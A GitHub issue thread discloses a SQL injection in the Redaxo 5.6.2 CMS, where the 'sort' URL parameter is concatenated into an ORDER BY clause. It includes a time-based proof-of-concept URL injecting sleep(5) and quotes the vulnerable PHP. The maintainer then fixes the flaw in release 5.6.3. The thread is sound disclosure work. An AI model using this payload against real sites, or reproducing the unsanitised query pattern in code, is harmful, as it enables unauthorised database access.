Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Sql Injection in Redaxo 5.6.2 #2043

Closed
Balis0ng opened this issue Sep 26, 2018 · 6 comments
Closed

Sql Injection in Redaxo 5.6.2 #2043

Balis0ng opened this issue Sep 26, 2018 · 6 comments
Assignees

Comments

@Balis0ng
Copy link

details

in redaxo/src/core/lib/list.php:716

    protected function prepareQuery($query)
    {
        $rowsPerPage = $this->pager->getRowsPerPage();
        $startRow = $this->pager->getCursor();

        // prepare query for fast rowcount calculation
        $query = preg_replace('/^\s*SELECT/i', 'SELECT SQL_CALC_FOUND_ROWS', $query, 1);
        $sortColumn = $this->getSortColumn();
        if ($sortColumn != '') {
            $sortType = $this->getSortType();

            if (stripos($query, ' ORDER BY ') === false) {
                $query .= ' ORDER BY `' . $sortColumn . '` ' . $sortType;
            } else {
                $query = preg_replace('/ORDER\sBY\s[^ ]*(\sasc|\sdesc)?/i', 'ORDER BY `' . $sortColumn . '` ' . $sortType, $query);
            }
        }
        echo $query;
        #exit;
        if (stripos($query, ' LIMIT ') === false) {
            $query .= ' LIMIT ' . $startRow . ',' . $rowsPerPage;
        }
        return $query;
    }

Called the getSortColumn function.View the function
in redaxo/src/core/lib/list.php:768

    public function getSortColumn($default = null)
    {
        if (rex_request('list', 'string') == $this->getName()) {
            return rex_request('sort', 'string', $default);
        }
        return $default;
    }

When the if condition is true, the function returns the value of the sort parameter obtained from the HTTP request.
Go back to the prepareQuery function above.

       if ($sortColumn != '') {
            $sortType = $this->getSortType();

            if (stripos($query, ' ORDER BY ') === false) {
                $query .= ' ORDER BY `' . $sortColumn . '` ' . $sortType;
            } else {
                $query = preg_replace('/ORDER\sBY\s[^ ]*(\sasc|\sdesc)?/i', 'ORDER BY `' . $sortColumn . '` ' . $sortType, $query);
            }

When the value of $sortColumn is not empty, $sortColumn is directly spliced into the SQL statement. Caused SQL injection.

Since this file (list.php) is used by many functions in this system. So there are a lot of SQL injections.

POC

Here I use mysql's time-based injection.
First visit http://localhost/redaxo/index.php?page=users/users
Click sort as shown:

At this point the URL becomes http://localhost/redaxo/index.php?page=users/users&6c9fee27_start=0&sort=login&sorttype=asc&list=6c9fee27
Change the URL as follows:
http://localhost/redaxo/index.php?page=users/users&6c9fee27_start=0&sort=login`,sleep(5),`login&sorttype=asc&list=6c9fee27

Then visit the URL and you will see a response delay of 15s

The complete SQL statement executed is

SELECT SQL_CALC_FOUND_ROWS            id,            IF(name <> "", name, login) as name,            login,            admin,            IF(admin, "Admin", IFNULL((SELECT GROUP_CONCAT(name ORDER BY `login`,sleep(5),`id` asc SEPARATOR ",") FROM rex_user_role r WHERE FIND_IN_SET(r.id, u.role)), "_no_role")) as role,            status,            UNIX_TIMESTAMP(lastlogin) as lastlogin        FROM rex_user u        ORDER BY `login`,sleep(5),`id` asc     LIMIT 0,30

Credit: ADLab of VenusTech

@staabm staabm self-assigned this Sep 26, 2018
@staabm
Copy link
Member

staabm commented Sep 26, 2018

Thx for the report. Will investigate.

Since you already posted other security related bug reports: would you mind reporting those issues to the redaxo core team? We can/will give you the credit after we fixed it in a release.

Thanks for your report!

@Balis0ng
Copy link
Author

Balis0ng commented Sep 26, 2018

@staabm Of course not.But I don't know how to report these issues to the core team.

@staabm
Copy link
Member

staabm commented Sep 26, 2018

For now, please report those errors to info@redaxo.de

We are aware that we need a more secure channel, but we dont have such channel right now
(Docs on how/where to report a security issue is only available in german right now.. we have to fix that)

@Balis0ng
Copy link
Author

@staabm OK, I will send the follow-up security question to this email, I hope that you will fix it and give me credit as soon as possible.

@staabm
Copy link
Member

staabm commented Sep 26, 2018

Just tagged 5.6.3 with a fix for the reported problem and credits for you in the changelog
https://github.com/redaxo/redaxo/releases/tag/5.6.3

We will do a release announcement on redaxo.org , again giving you credits.

Thx for the report

@Balis0ng
Copy link
Author

@staabm OK. Thank you.

staabm added a commit to redaxo/redaxo4 that referenced this issue Dec 19, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Development

No branches or pull requests

2 participants